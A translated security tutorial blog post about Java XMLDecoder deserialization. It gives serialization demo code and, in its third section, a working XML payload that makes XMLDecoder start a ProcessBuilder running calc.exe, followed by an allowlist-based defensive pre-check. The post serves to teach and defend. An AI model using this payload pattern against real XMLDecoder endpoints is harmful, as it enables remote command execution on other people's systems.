What, you still don't understand deserialization?

0x01 Preface

In an earlier post we covered the relatively basic and common form of Java deserialization, but deserialization in Java comes in more than one form. Today I want to introduce serialization and deserialization with the XMLDecoder class.

0x02 XMLDecoder introduction

This class ships with the JDK at java.beans.XMLDecoder. Serialization here means converting a Java object into an XML file (done by the companion class XMLEncoder), and deserialization means converting an XML file in a specific format back into a Java object.

We still use a small demo to get familiar with its usage.

Create a class with two methods: one performs the serialization, the other the deserialization.

import java.beans.XMLDecoder;
import java.beans.XMLEncoder;
import java.io.*;

public class XMLTest {

    // Serialize the object to the file person.xml
    public void xmlEncode() throws FileNotFoundException {
        Person person = new Person();
        person.setAge(18);
        person.setName("axin");
        XMLEncoder xmlEncoder = new XMLEncoder(new BufferedOutputStream(new FileOutputStream("person.xml")));
        xmlEncoder.writeObject(person);
        xmlEncoder.close();
        System.out.println("Serialization finished!");
    }

    // Deserialize the object from person.xml
    public void xmlDecode() throws FileNotFoundException {
        XMLDecoder xmlDecoder = new XMLDecoder(new BufferedInputStream(new FileInputStream("person.xml")));
        Person person = (Person) xmlDecoder.readObject();
        xmlDecoder.close();
        person.sayHello();
        System.out.println("Deserialization succeeded!");
    }

    public static void main(String[] args) throws FileNotFoundException {
        XMLTest xmlTest = new XMLTest();
        xmlTest.xmlEncode();
        xmlTest.xmlDecode();
    }
}

The Person class is as follows:

public class Person {

    String name = "";
    int age;

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public int getAge() {
        return age;
    }

    public void setAge(int age) {
        this.age = age;
    }

    public void sayHello() {
        System.out.println("Hello, my name is " + name);
    }
}

Run the XMLTest class: a person.xml file is generated in the current project directory, and the terminal prints the output of the sayHello call.

The xml file format generated by serialization is as follows:

<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_231" class="java.beans.XMLDecoder">
 <object class="Person">
  <void property="age">
   <int>18</int>
  </void>
  <void property="name">
   <string>axin</string>
  </void>
 </object>
</java>

Deserializing the above xml file rebuilds the Person object, after which its sayHello method is executed.

0x03 How to use

Now that we know the usual serialization and deserialization flow of XMLDecoder, how can it be abused?

Its deserialization mechanism lets the XML instantiate any class and invoke methods on it, which is enough to execute arbitrary commands. For example, construct the following xml file:

<java>
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="1">
            <void index="0">
                <string>calc.exe</string>
            </void>
        </array>
        <void method="start">
        </void>
    </object>
</java>

If the above xml file is deserialized, XMLDecoder constructs a ProcessBuilder with the String array containing "calc.exe", calls its start method, and a calculator pops up.
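A defensive counterpart, added here and not part of the original post: XMLDecoder has no class filter of its own, so the document has to be inspected with an ordinary DOM parser before the decoder ever sees it, rejecting any class outside an allowlist and any `method` attribute. The class name GuardedXmlDecode, the allowlist of Person and java.lang.String, and the two inline inputs are assumptions constructed for this example.

```java
import java.beans.XMLDecoder;
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;

public class GuardedXmlDecode {
    // Assumption: the application only ever expects its own Person bean and the String values it carries.
    private static final Set<String> ALLOWED = new HashSet<>(Arrays.asList("Person", "java.lang.String"));

    // Inspect the document with a plain DOM parser before XMLDecoder ever sees it.
    public static boolean isAcceptable(byte[] xml) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // The pre-check must not become an XXE sink itself: refuse any DOCTYPE.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        Document doc = f.newDocumentBuilder().parse(new ByteArrayInputStream(xml));
        NodeList all = doc.getElementsByTagName("*");
        for (int i = 0; i < all.getLength(); i++) {
            Element e = (Element) all.item(i);
            if ("java".equals(e.getTagName())) continue;       // root carries class="java.beans.XMLDecoder"
            if ("class".equals(e.getTagName())) return false;  // <class> literals resolve arbitrary types
            // <object>, <new>, <array> and <void> all name a type through their class attribute.
            if (e.hasAttribute("class") && !ALLOWED.contains(e.getAttribute("class"))) return false;
            // A bean needs only <void property="..."> setters; <void method="..."> is how the payload reaches start().
            if (e.hasAttribute("method")) return false;
        }
        return true;
    }
    public static Object decode(byte[] xml) throws Exception {
        if (!isAcceptable(xml)) throw new SecurityException("XMLDecoder document rejected by allowlist");
        try (XMLDecoder d = new XMLDecoder(new ByteArrayInputStream(xml))) {
            return d.readObject();
        }
    }
    public static void main(String[] args) throws Exception {
        // Constructed inputs: a trimmed person.xml from above and the ProcessBuilder document from 0x03.
        String person = "<java><object class=\"Person\"><void property=\"age\"><int>18</int></void></object></java>";
        String cmd = "<java><object class=\"java.lang.ProcessBuilder\"><array class=\"java.lang.String\" length=\"1\">"
                + "<void index=\"0\"><string>calc.exe</string></void></array><void method=\"start\"/></object></java>";
        System.out.println("person accepted: " + isAcceptable(person.getBytes(StandardCharsets.UTF_8)));
        System.out.println("cmd accepted: " + isAcceptable(cmd.getBytes(StandardCharsets.UTF_8)));
    }
}
```

The check is only as good as the allowlist: every class the application legitimately serializes has to be listed, and anything that is not a plain bean with setters will still need a more specific rule.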

0x04 Other

This chapter only covers the basic principle of XMLDecoder deserialization. As before, I will look for a real case to help you understand the vulnerability more clearly. Of course, it is the same medicine in a different soup: the scenario of the vulnerability changes, but its essence does not~

In the next chapter, let’s take a look at the XMLDecoder deserialization vulnerability in weblogic.


Origin blog.csdn.net/he_and/article/details/107219395